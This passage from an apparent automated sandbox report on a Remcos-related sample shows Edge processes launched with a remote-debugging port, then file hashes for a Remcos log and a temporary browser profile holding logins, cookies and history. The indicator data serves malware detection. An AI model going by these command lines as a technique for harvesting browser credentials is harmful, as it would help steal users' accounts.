                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2020,10989294543221847008,2873214528730484201,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2796 /prefetch:8
                            4⤵
                              PID:2184
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2020,10989294543221847008,2873214528730484201,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1
                              4⤵
                              • Uses browser remote debugging
                              PID:2404
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2020,10989294543221847008,2873214528730484201,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3492 /prefetch:1
                              4⤵
                              • Uses browser remote debugging
                              PID:5108
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2020,10989294543221847008,2873214528730484201,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5428 /prefetch:1
                              4⤵
                              • Uses browser remote debugging
                              PID:3240
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2020,10989294543221847008,2873214528730484201,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5552 /prefetch:1
                              4⤵
                              • Uses browser remote debugging
                              PID:4056
                      • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                        "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                        1⤵
                          PID:776
                        • C:\Windows\System32\CompPkgSrv.exe
                          C:\Windows\System32\CompPkgSrv.exe -Embedding
                          1⤵
                            PID:5088
                          • C:\Windows\System32\CompPkgSrv.exe
                            C:\Windows\System32\CompPkgSrv.exe -Embedding
                            1⤵
                              PID:1368

                            Network

                            MITRE ATT&CK Enterprise v15

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            • C:\ProgramData\remcos\logs.dat

                              Filesize

                              144B

                              MD5

                              c0f870411ff18da941a502835bcdc631

                              SHA1

                              2b012197f87f51a3491765784a154e9f2b17817e

                              SHA256

                              0a0b5580557c31443caec85b7d4d03e5e72f4b4d9aa22390acc70306ddafae18

                              SHA512

                              edabeaacc352887c924c3f38c3deb5ddc571f960189b1328a922aec8556f8bb23b8c2fb50ac063162e4a6f83665f28e289498dc70bdc0c29ca55b1e8f08ba7f9

                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                              Filesize

                              1KB

                              MD5

                              71444def27770d9071039d005d0323b7

                              SHA1

                              cef8654e95495786ac9347494f4417819373427e

                              SHA256

                              8438eded7f1ab9b4399a069611fe8730226bcdce08fab861d4e8fae6ef621ec9

                              SHA512

                              a721af797fd6882e6595b7d9610334f1fb57b809e504452eed4b0d0a32aaf07b81ce007bd51605bec9fcea7ec9f1d8424db1f0f53b65a01126ec4f5980d86034

                            • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

                              Filesize

                              40B

                              MD5

                              1c17737a3c7c874660e3ad3aa27f2ace

                              SHA1

                              5d653aa83b2aa77521dd84f2d81ee49c297e1dda

                              SHA256

                              b4d9560450b7a566c8cd2012758c0c2c7e4e3fed657ef6d9b0035380a7592939

                              SHA512

                              9a3d3474d1161094912b140528b055563999a8ef94043e7ea92d2c65976a26a2a10088ffa7adfff5f225b0e0a7af41e3bbfd2e218c41c7db3859e54b217071c0

                            • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

                              Filesize

                              152B

                              MD5

                              6ed634fe61b37478d5be59f6c361b01a

                              SHA1

                              c9d276c241839d97a9a91d771ec2f1645cea3395

                              SHA256

                              cc649f2afb5b2667e8b0622040dba9c6a3488234069fcaff260f07aba6e83553

                              SHA512

                              0daae38519258bc49f60644c81acc394748df2806a4bb33782cf0e9a7f443d4ebea7ebbfebf6f03b0475e3eaa96f7734d9c0f2bbfd60ac489612749b761d78b4

                            • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

                              Filesize

                              152B

                              MD5

                              17e4184cd7075e3e83a4f4794c5bf438

                              SHA1

                              2fa9af7cf91b11480d439d52bf174a35a9dbfb5a

                              SHA256

                              882678b407cb6b7710b71cb6816df4692e22e821a03a2bfe271ff84faed2b245

                              SHA512

                              766f74658599ac109c63d5ea3407033059527197704e557dc97f55a9252aa1d8ac3bff96d732447bc12fdfc69d86c62aa2961b5cdbcc621378849f6c90addf62

                            • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

                              Filesize

                              152B

                              MD5

                              e8b31c29d8cf49fb82d8fcbca10180b2

                              SHA1

                              1f68a0d4d1b145b67a25701f6cda140e7b70767c

                              SHA256

                              cf4cabc9a3860c8aeb76360c51aacc1b26b6280244d3120cf9c6bb6ce8f85c24

                              SHA512

                              c710c752c0d53fd657527dfe537523addbdf0731b852e658ba19cab309d4a74791742c7a06d18b654d54ed998cfda27bc74ccaf1f449918764ea8ac18decca08

                            • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\throttle_store.dat

                              Filesize

                              20B

                              MD5

                              9e4e94633b73f4a7680240a0ffd6cd2c

                              SHA1

                              e68e02453ce22736169a56fdb59043d33668368f

                              SHA256

                              41c91a9c93d76295746a149dce7ebb3b9ee2cb551d84365fff108e59a61cc304

                              SHA512

                              193011a756b2368956c71a9a3ae8bc9537d99f52218f124b2e64545eeb5227861d372639052b74d0dd956cb33ca72a9107e069f1ef332b9645044849d14af337

                            • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Code Cache\js\index

                              Filesize

                              24B

                              MD5

                              54cb446f628b2ea4a5bce5769910512e

                              SHA1

                              c27ca848427fe87f5cf4d0e0e3cd57151b0d820d

                              SHA256

                              fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d

                              SHA512

                              8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

                            • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Code Cache\wasm\index-dir\the-real-index

                              Filesize

                              48B

                              MD5

                              86a9037ec94d3712c85e8734e08777f3

                              SHA1

                              b540be939bd64d3398ffe083ea18e97cdcbc6df2

                              SHA256

                              85d0e24686bec517b81ee4455338870192a83d14711ec0777fd6c7f48949f8d9

                              SHA512

                              c7eb6fe79766f048220f457558a22c1ad5aa63dc704497532b82b53c9def9094440dbc4bf3bbe426ebfbcf8b3e5e07896789892cdade71f2096dd8bceadf967c

                            • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Favicons

                              Filesize

                              20KB

                              MD5

                              b40e1be3d7543b6678720c3aeaf3dec3

                              SHA1

                              7758593d371b07423ba7cb84f99ebe3416624f56

                              SHA256

                              2db221a44885c046a4b116717721b688f9a026c4cae3a17cf61ba9bef3ad97f4

                              SHA512

                              fb0664c1c83043f7c41fd0f1cc0714d81ecd71a07041233fb16fefeb25a3e182a77ac8af9910eff81716b1cceee8a7ee84158a564143b0e0d99e00923106cc16

                            • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\GPUCache\index

                              Filesize

                              256KB

                              MD5

                              6e24b76cf4167eea003ea5418e2750f5

                              SHA1

                              e579b143dcd83ca70f4d60e7741480c042c17a19

                              SHA256

                              e8dd6a1df02a9e48786793445cb9f2abaac4e578a593071a96ad0030499fcb17

                              SHA512

                              db2d02f2b0ed78dc208c854a35fafef21641cfcd10024074c55393c7608e7f51d7a98534947fe856fc28b4002a73091dd9ee72dda02ae78301c53c8d23ad9bae

                            • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\History

                              Filesize

                              192KB

                              MD5

                              d30bfa66491904286f1907f46212dd72

                              SHA1

                              9f56e96a6da2294512897ea2ea76953a70012564

                              SHA256

                              25bee9c6613b6a2190272775a33471a3280bd9246c386b72d872dc6d6dd90907

                              SHA512

                              44115f5aaf16bd3c8767bfb5610eba1986369f2e91d887d20a9631807c58843434519a12c9fd23af38c6adfed4dbf8122258279109968b37174a001320839237

                            • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Local Storage\leveldb\CURRENT

                              Filesize

                              16B

                              MD5

                              46295cac801e5d4857d09837238a6394

                              SHA1

                              44e0fa1b517dbf802b18faf0785eeea6ac51594b

                              SHA256

                              0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                              SHA512

                              8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                            • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Local Storage\leveldb\LOG

                              Filesize

                              277B

                              MD5

                              8d534cbc9f1ef6cf1571cc1997787370

                              SHA1

                              330760bbb9ad20f5d9c5251aac13a780deea4ee2

                              SHA256

                              6372c52d7ca2ed8e394c1817a8dfa30adc4ad87a97367a1bea3198711a174ae3

                              SHA512

                              417d2cd295782e4e8d66abfc33baaefa569a6f4b3f5cf0a3017aef3d154c1fde53725d3468e1b53efe2b33f0ec27bc95a2ccaa1f08152e0747b6b528c48cdc6a

                            • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Local Storage\leveldb\MANIFEST-000001

                              Filesize

                              41B

                              MD5

                              5af87dfd673ba2115e2fcf5cfdb727ab

                              SHA1

                              d5b5bbf396dc291274584ef71f444f420b6056f1

                              SHA256

                              f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

                              SHA512

                              de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

                            • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Login Data

                              Filesize

                              40KB

                              MD5

                              a182561a527f929489bf4b8f74f65cd7

                              SHA1

                              8cd6866594759711ea1836e86a5b7ca64ee8911f

                              SHA256

                              42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914

                              SHA512

                              9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

                            • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Microsoft Edge.lnk

                              Filesize

                              1KB

                              MD5

                              b639f0f5e23144e5269324102226cb79

                              SHA1

                              db1ddba380d4f19e81ae7c0f458b7fe1e2b01e0a

                              SHA256

                              25f9c3ce41baeaa4bcfb5cc58d813237487c469147a7de7cd897b20dfb4187ad

                              SHA512

                              ba2fa67742c2720d4b1df29862a3d43e919330c2116ae261ab933da7f00e34ef44da25baa6562d6cf4a04991129c4fc82061700d289610ff88acc8b047287bad

                            • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Network\Cookies

                              Filesize

                              20KB

                              MD5

                              ca4fb74cc41f5e23584aed59e9b00d29

                              SHA1

                              c535853441e2a9d4a50b2c7c1f53442e06e28314

                              SHA256

                              1779ae7fbe5f4882b8600a85663b882d82e1f94336f5eea3a9d75b943e345bc2

                              SHA512

                              1f047f7f2606a1a8a94aa78982414faf1dbf1abecf3abb8dd3f403ef76f6533c6f697355774cf3dea0c54444f682b66a297eee40277f9f4762460356627a9a08

                            • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Network\SCT Auditing Pending Reports

                              Filesize

                              2B

                              MD5

                              d751713988987e9331980363e24189ce

                              SHA1

                              97d170e1550eee4afc0af065b78cda302a97674c

                              SHA256

                              4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                              SHA512

                              b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                            • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Preferences

                              Filesize

                              1KB

                              MD5

                              0d4b3eeb6b4343ffcc5a9aa997f52bf4

                              SHA1

                              28c9da82e5539ed572b6fec079b554fa8aec4ea1

                              SHA256

                              6fdef3a9e405c12f661f27b154905fba6a07360e4637f2a26766121eea57461b

                              SHA512

                              1067628201faab52f28d364cf83650f2368d9921c4459a8d388a863a15e15e850a9a61ec0d36158b9f4d590ce93bf8619a6ba2dda94786f6d6527fa824775aa2

                            • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Preferences

                              Filesize

                              5KB

                              MD5

                              c1ba66c1766eda0ee7a49070f3682adf

                              SHA1

                              1a51345ac8a28be2fab94c9a342ee63d34927285

                              SHA256

                              b0961f267c36078bf5ccf9f022e0175e96416351eaebecc4d42fac96a2cfc46c

                              SHA512

                              9c32d2226fffe25fe31f77affa0dc8cfdbe065fcc83ca734564ba659dd82db5cbaad92507ca92d915f4b8008956c650795737bffba58324789bc2306937e0218

                            • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Preferences

                              Filesize

                              5KB

                              MD5

                              3f451ca07a4e06fb7a5a237a1d444149

                              SHA1

                              8968d21ee236e06bc7b5f4704102b23e4284df02

                              SHA256

                              a18cf48405a718dc0aa8efb22a81a4048c9f7784fe079bf32429f148075a2212

                              SHA512

                              a926081c6d47ebb9675c40a020338370cad11b69e6d3750d96fa68527dda02449f7a30bf5d203f492a7354afab4ba863849cfcf80b44f3d35b3252b8bf54c78e

                            • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Secure Preferences

                              Filesize

                              15KB

                              MD5

                              0e22211f1e332db3305814f41692eaf8

                              SHA1

                              6b7f95f6ce90807c6b39189b6387cd9f51086ca7

                              SHA256

                              8c222015da24e6908e7ccbcb286ec420dc7bf19ffede90ab6fe4733c84093e4a

                              SHA512

                              6d09bb86181f0ab9b609155f19dea78c6f6e7fb4dc4375556df7520d641958df0ada60b1ea142e3888c28dbd2c0ab46ee3ea190a80d26490e3127030eb902c87

                            • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Secure Preferences

                              Filesize

                              24KB

                              MD5

                              250fa8ddbcd25046617cbda286adfa8d

                              SHA1

                              791aff45a33de50edd5e3ee129572f11d1bd4163

                              SHA256

                              d28979f947949ac36d9d5fee27c304ce052ce17a0180c3e1040281fb04a262a7

                              SHA512

                              c680a46eebf78338e2b77e7e77240f7da86a853db91bd9ff0813dadb45cb2c3a8f2dce0ea1c8c130b0913807d99cc6d589a649c2a77a71109889b8a175d6f5ac

                            • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Service Worker\Database\000003.log

                              Filesize

                              241B

                              MD5

                              9082ba76dad3cf4f527b8bb631ef4bb2

                              SHA1

                              4ab9c4a48c186b029d5f8ad4c3f53985499c21b0

                              SHA256

                              bff851dedf8fc3ce1f59e7bcd3a39f9e23944bc7e85592a94131e20fd9902ddd

                              SHA512

                              621e39d497dece3f3ddf280e23d4d42e4be8518e723ecb82b48f8d315fc8a0b780abe6c7051c512d7959a1f1def3b10b5ed229d1a296443a584de6329275eb40

                            • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Service Worker\Database\LOG

                              Filesize

                              279B

                              MD5

                              40d3a36d960e42c6b7e796ac81cf4fc7

                              SHA1

                              4012626ea7d8671f0b962c35cfa00bd0798b416b

                              SHA256

                              1b016f6bda85576c6b8f0c85a48e27cb94af734a51c76e3ed88d6b0c11fb8c8c

                              SHA512

                              c3c0920d98e4b1fc3177eb7fad183535e699e2a892e7c29283947cd9064ede85737b9f1033d6df296c8b9cea8e0e23c372bdb7b3869b1a0a724dfc6ec64f08af

                            • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Session Storage\000003.log

                              Filesize

                              80B

                              MD5

                              69449520fd9c139c534e2970342c6bd8

                              SHA1

                              230fe369a09def748f8cc23ad70fd19ed8d1b885

                              SHA256

                              3f2e9648dfdb2ddb8e9d607e8802fef05afa447e17733dd3fd6d933e7ca49277

                              SHA512

                              ea34c39aea13b281a6067de20ad0cda84135e70c97db3cdd59e25e6536b19f7781e5fc0ca4a11c3618d43fc3bd3fbc120dd5c1c47821a248b8ad351f9f4e6367

                            • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Session Storage\LOG

                              Filesize

                              265B

                              MD5

                              3ed209e00ff1a09f106a7248d91a76a8

                              SHA1

                              08d08d15d08996a48d0475a52046ddb4a3b49ee5

                              SHA256

                              b465ce1af10e3e68148497cdfe4a3dfa986ce51f8989563863ecd7e05f997284

                              SHA512

                              6b78b14ff79ab043cf17d5f4c4c239eedbcc680886bde75d566cf0006aaf50d9d2ca7dff615dc14e6b32099d68362a7db1d0b4ba6e1ec914de76b22c925ccdd0

                            • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Site Characteristics Database\000003.log

                              Filesize

                              40B

                              MD5

                              148079685e25097536785f4536af014b

                              SHA1

                              c5ff5b1b69487a9dd4d244d11bbafa91708c1a41

                              SHA256

                              f096bc366a931fba656bdcd77b24af15a5f29fc53281a727c79f82c608ecfab8

                              SHA512

                              c2556034ea51abfbc172eb62ff11f5ac45c317f84f39d4b9e3ddbd0190da6ef7fa03fe63631b97ab806430442974a07f8e81b5f7dc52d9f2fcdc669adca8d91f

                            • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Site Characteristics Database\LOG

                              Filesize

                              291B

                              MD5

                              142513e16d0b5be639d3153961628f82

                              SHA1

                              e19c3d035710236d8b0ec744b6fdfd07a61d0259

                              SHA256

                              fa9c23f422b6eafd6396c0f488e14d25cfaa922eb0c16207f4eb77265cf7cbf6

                              SHA512

                              7c686d1881b233f545cd5a5f3147ca76b2fa2d05c801b78a53b73d8755f69006ddced290465fec1de610408a7f78c90c41c0e84728b897bdf30d3059934dcf9c

                            • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Sync Data\LevelDB\000003.log

                              Filesize

                              46B

                              MD5

                              90881c9c26f29fca29815a08ba858544

                              SHA1

                              06fee974987b91d82c2839a4bb12991fa99e1bdd

                              SHA256

                              a2ca52e34b6138624ac2dd20349cde28482143b837db40a7f0fbda023077c26a

                              SHA512

                              15f7f8197b4fc46c4c5c2570fb1f6dd73cb125f9ee53dfa67f5a0d944543c5347bdab5cce95e91dd6c948c9023e23c7f9d76cff990e623178c92f8d49150a625

                            • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Sync Data\LevelDB\LOG

                              Filesize

                              267B

                              MD5

                              babc2c29ea0d7289fa365fe8213658d7

                              SHA1

                              4b6eaf8cff43d43b4f3c4e8eec506b70acbc823f

                              SHA256

                              c754d53f746110df6d0accd5498ee9dc6170a882d305303bb8a6c0d5a8f79440

                              SHA512

                              5a84c480d34e7ea7799b38e73b211c617f356ddcbdb92271a4933e18b74a27e3cd5239212e2d695628f6fd3516109b1f4812bd0aa5356333cb7f9e74105eb827

                            • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Top Sites

                              Filesize

                              20KB

                              MD5

                              986962efd2be05909f2aaded39b753a6

                              SHA1

                              657924eda5b9473c70cc359d06b6ca731f6a1170

                              SHA256

                              d5dddbb1fbb6bbf2f59b9d8e4347a31b6915f3529713cd39c0e0096cea4c4889

                              SHA512

                              e2f086f59c154ea8a30ca4fa9768a9c2eb29c0dc2fe9a6ed688839853d90a190475a072b6f7435fc4a1b7bc361895086d3071967384a7c366ce77c6771b70308

                            • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Visited Links

                              Filesize

                              128KB

                              MD5

                              4be83c6fd9a68952969d958d3624ef86

                              SHA1

                              52a62653e7156f7fa824aa570303a8b00a3c3853

                              SHA256

                              91a718faa7ebc40ea4d6516794943a1a4ab66b1c01ccb5886168b254e06ca24b

                              SHA512

                              bd4e586efdab83727e3e14cbcd6a51fcd718ce3ee0e9f8ee5730d66b1a3450b525766a0f8dbcba79d4f4dbef331cc5a7a86edafcd3688a4018b796e51b25979b

                            • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Web Data

                              Filesize

                              114KB

                              MD5

                              c67d2a6b63772831072044de78ea2ef6

                              SHA1

                              411fe4dce38aaa9f6a8b9fe77d0d938dfc3918fe

                              SHA256

                              ba9541c52e5ebdaf2747a4d071092047b6a0a5865e037c36bf1de9f148a668e4

                              SHA512

                              dfb9f4776c6d64f0a7edc1e97f6daa3deb88205b6ceadc5fe4d7ec9fabadafd243c0e90f70b9683744fe6cd8edda9bf3335325473eae6f59fb8dc9cdd2a0fd8c

                            • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\000003.log

                              Filesize

                              4KB

                              MD5

                              99ca27536e01be0640b886a0cfebd13b

                              SHA1

                              3dca5dfb9a1d02cd3b20f884470a5045af78c23d

                              SHA256

                              f588913e4fb0c94ef45e7e451afed63c1d12e13af45c846ac01006039e025fab

                              SHA512

                              bb75c24d518f2cc41af3ce3fca9062d901bd2abbdd373dabe74e94f564f50c45b9f82b9c35fe28ed280cf15a4bea74f6a50713ab5b3b3d4637f2e8e9cacf65a2

                            • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\LOG

                              Filesize

                              263B

                              MD5

                              addb829007a476eafa38c81e35650712

                              SHA1

                              69db91f6633561fc67d07cd0a50ecc7e935c2935

                              SHA256

                              16b35f69b77825865a6fcfd44d6a07bbefe149b97115b7a6153efe3b0f76f8e5

                              SHA512

                              094cca4e0ef6e8eb34e80094017cf85dab8c63e172310f57f88aa889aff0b98fa89f31fd93047152df03765e38789fa5990dc0b42414f28c28ad68da941fcb1d

                            • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\metadata\000003.log

                              Filesize

                              682B

                              MD5

                              4f8b9a5478bfc0bc663c3f30ec08c0b2

                              SHA1

                              26f96fa5f919bbdac85deda73b505e008e0c3c04

                              SHA256

                              0fa6436a31e1f5d4d9642a3b9726fd6cd0a8d033d4a5d2d22e5e71d15e7662de

                              SHA512

                              7ddc8fecea8856eb6ad4a8d3c31508fe0bf5b0dd424140ea56cced70592da83f2391a4fe9e11ecbf925fff36d8c1a0f4d5bd4dac3ef570d6e69a0e78b37f8a0d

                            • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\metadata\LOG

                              Filesize

                              281B

                              MD5

                              e9ac40cd71693c72cf53ae56a2d2b0b2

                              SHA1

                              55ad173631b5fb13e09e184337050c14a213b847

                              SHA256

                              a8a0f5d040acece483bbcdca33ccb1d6140c16aa2958a70f99686a7e76be23be

                              SHA512

                              bf754a5609be2f6b534074c5872002c6e14c9d12a35b4d400e2e4fd3a290abe7f6886ad6cc4743463922fc222786821607007f9b3fc8d592d56510a9b0bf84fc

                            • C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_0

                              Filesize

                              8KB

                              MD5

                              cf89d16bb9107c631daabf0c0ee58efb

                              SHA1

                              3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b

                              SHA256

                              d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e

                              SHA512

                              8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

                            • C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_1

                              Filesize

                              264KB

                              MD5

                              d0d388f3865d0523e451d6ba0be34cc4

                              SHA1

                              8571c6a52aacc2747c048e3419e5657b74612995

                              SHA256

                              902f30c1fb0597d0734bc34b979ec5d131f8f39a4b71b338083821216ec8d61b

                              SHA512

                              376011d00de659eb6082a74e862cfac97a9bb508e0b740761505142e2d24ec1c30aa61efbc1c0dd08ff0f34734444de7f77dd90a6ca42b48a4c7fad5f0bddd17

                            • C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_2

                              Filesize

                              8KB

                              MD5

                              0962291d6d367570bee5454721c17e11

                              SHA1

                              59d10a893ef321a706a9255176761366115bedcb

                              SHA256

                              ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7

                              SHA512

                              f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

                            • C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_3

                              Filesize

                              8KB

                              MD5

                              41876349cb12d6db992f1309f22df3f0

                              SHA1

                              5cf26b3420fc0302cd0a71e8d029739b8765be27

                              SHA256

                              e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c

                              SHA512

                              e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

                            • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Last Version

                              Filesize

                              11B

                              MD5

                              838a7b32aefb618130392bc7d006aa2e

                              SHA1

                              5159e0f18c9e68f0e75e2239875aa994847b8290

                              SHA256

                              ac3dd2221d90b09b795f1f72e72e4860342a4508fe336c4b822476eb25a55eaa

                              SHA512

                              9e350f0565cc726f66146838f9cebaaa38dd01892ffab9a45fe4f72e5be5459c0442e99107293a7c6f2412c71f668242c5e5a502124bc57cbf3b6ad8940cb3e9

                            • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Local State

                              Filesize

                              8KB

                              MD5

                              818d881de268a48a1dad0e56250d5e27

                              SHA1

                              aee71c144c14e5261b4ce66b02bd0aa22f68c16d

                              SHA256

                              1339647dc895e0598d9e01c16a5d92fdce5487242b242a352f2f91c14b6c943b

                              SHA512

                              aa6862a037dc0052ee6dc2d3e47e5eea53d3be5371f96bf73113432fdc15127f77ada9be1c9fa1a29c2c7bc12ee6b0706ae96a8f2726dcf35f5c949d8e2b0fe2

                            • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Local State

                              Filesize

                              116KB

                              MD5

                              7d27a3f82738c2bb47227efc89379649

                              SHA1

                              d689df4e7fc03eef5f1a4f64d725048d9b6a4d92

                              SHA256

                              45e69d00fb01b23afba203564a6424991be752e87f41c34aa0ed3add95e712b9

                              SHA512

                              1e99a7ccd4825722570003d5f06751e62c6c2311defc6cb105a6f78b41628841d0b6aa21fda2c0ce52ae91d048469f5dd1798a75f0e1e78db2d3c192f1b7a9f5

                            • C:\Users\Admin\AppData\Local\Temp\TmpUserData\Local State

                              Filesize

                              10KB

                              MD5

                              26bc2404470dddc5036483f35274d304

                              SHA1

                              b9d0c30f7ec0fd3d2f3fe2935f12412b23a52ef9

                              SHA256

                              773190538c0698ca3b6975719dcfcae55997d5a68821e7f0845f38d6377eeb10

                              SHA512

                              f79e9cb6dee59acebc621260c88e622f5504478fc2dcef926520fbd477d9b8fd0d211194b6e74b4ea53e4fcf1c4e6d7e0860a376737f604e47cca6e1c66b6bd0

                            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jnlwyryd.eh2.ps1

                              Filesize

                              60B

                              MD5

                              d17fe0a3f47be24a6453e9ef58c94641

                              SHA1

                              6ab83620379fc69f80c0242105ddffd7d98d5d9d

                              SHA256

                              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                              SHA512

                              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                            • C:\Users\Admin\AppData\Local\Temp\aeagtpivekovlnzjj

                              Filesize

                              4KB

                              MD5

                              75379d3dcbcea6a69bc75b884816dd40

                              SHA1

                              7e073a03c3bdbbc60375ddbe56bba211c3d412a6

                              SHA256

                              cab559f3bbe4a0beb194dffca723b3072184b92687100462eaab04d66fff8de9

                              SHA512

                              710c2cee369a57a0039fc0d0c59de6118780210ef60ad0daf374f03ba94ab08039bc2aff821f7c99a0ecd0e16189c52e5b6d630b3d541f7b11375f134b985e8c

                            • C:\Users\Admin\AppData\Roaming\Kbstadboerne8.tid

                              Filesize

                              428KB

                              MD5

                              5ae15005322cfb3c865e91fef7e25d31

                              SHA1

                              634884dcb1d8177f0ee43e90b620673278a8a5b1

                              SHA256

                              e4d05ccc25a075a14ed27618fb5c00594b20ad408871bff34a038f44c8605433

                              SHA512

                              5ff3687807442ba52b7d36cbfd17c371295ed804ea27dc3867a514df46bd23152262ef7ae46fac2f0b01044c757cc347509f11a11c618fb4a3fb51b3e3eaff2d

                            • memory/2356-99-0x0000000000400000-0x0000000000424000-memory.dmp

                              Filesize

                              144KB

                            • memory/2356-86-0x0000000000400000-0x0000000000424000-memory.dmp

                              Filesize

